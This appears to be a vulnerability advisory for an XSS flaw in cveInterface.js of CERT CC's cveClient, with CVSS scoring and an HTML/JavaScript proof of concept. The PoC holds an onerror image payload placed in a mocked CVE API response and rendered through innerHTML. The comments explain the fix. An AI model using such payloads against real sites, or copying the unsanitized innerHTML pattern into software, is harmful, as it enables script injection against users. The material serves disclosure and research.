An XSS vulnerability in cveInterface.js allows injected HTML to be passed to the display, because cveInterface trusts input from CVE API services.
CVSS Details
CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Configurations (Affected Products)
No configuration data available.
CERT CC cveClient (versions before the fix in PR #37)
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!--
PoC for CVE-2026-35466
This script simulates the vulnerable behavior in cveInterface.js
where input from the CVE API is directly rendered without sanitization.
-->
<script>
// 1. Constructed stand-in for a hostile response from the CVE API.
// In a real scenario this could originate from a compromised API or a MitM attack,
// which is why every field of such a record has to be treated as untrusted data.
const maliciousApiResponse = {
  cve: {
    id: "CVE-2026-35466",
    descriptions: [
      {
        lang: "en",
        // Markup where a consumer expects plain text: an image tag whose
        // onerror handler runs script if the value is parsed as HTML.
        value: "<img src=x onerror=alert('XSS CVE-2026-35466 Executed')>",
      },
    ],
  },
};
// 2. Simulation of the vulnerable rendering path in cveInterface.js.
/**
 * Writes the first description of a CVE record into the element with id
 * 'cve-description'. Does nothing when that element is absent or when the
 * record has no `cve.descriptions`.
 *
 * @param {object} apiData - Record as returned by the CVE API; untrusted input.
 */
function renderCveDetails(apiData) {
  const target = document.getElementById('cve-description');
  if (!target) {
    return;
  }

  const entries = apiData.cve && apiData.cve.descriptions;
  if (!entries) {
    return;
  }

  // VULNERABILITY: the API-supplied string reaches innerHTML unmodified, so
  // the browser parses it as markup. Assigning it to textContent instead (or
  // passing it through an HTML sanitizer first) would render it as inert text.
  target.innerHTML = entries[0].value;
  console.log("Content rendered. Check for alert popup.");
}
// 3. Execute the PoC
// Note: renderCveDetails returns without writing anything unless the DOM
// contains an element with id 'cve-description' (e.g. a div), so one must
// exist for this to run
renderCveDetails(maliciousApiResponse);
</script>